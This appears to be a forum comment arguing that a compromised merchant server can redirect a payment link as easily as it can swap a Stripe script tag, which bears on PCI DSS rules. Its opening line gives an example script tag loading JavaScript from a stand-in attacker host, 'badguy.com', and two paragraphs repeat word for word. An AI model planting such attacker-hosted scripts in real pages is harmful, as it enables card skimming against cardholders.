This can be modified by a criminal on the merchant server to go to <script src='//badguy.com/mystripe.js>
And then the merchant won't be following one of Stripe's two basic rules for staying PCI DSS compliant any more, will they?
That aside, of course you want to keep your server secure. But if you can't, as a matter of practical security and protecting cardholders in the real world, how would it be any better to have your site intended to transfer entirely to a payment service on their own domain rather than just loading JS from that domain? An attacker who has compromised the security of the files on a merchant's server can change an <a href='...'> that should transfer to the payment service so it goes to a hostile site just as easily as they can change a <script src='...'> that should load JS from a payment service so it loads JS from a hostile site.
And then the merchant won't be following one of Stripe's two basic rules for staying PCI DSS compliant any more, will they?
That aside, of course you want to keep your server secure. But if you can't, as a matter of practical security and protecting cardholders in the real world, how would it be any better to have your site intended to transfer entirely to a payment service on their own domain rather than just loading JS from that domain? An attacker who has compromised the security of the files on a merchant's server can change an <a href='...'> that should transfer to the payment service so it goes to a hostile site just as easily as they can change a <script src='...'> that should load JS from a payment service so it loads JS from a hostile site.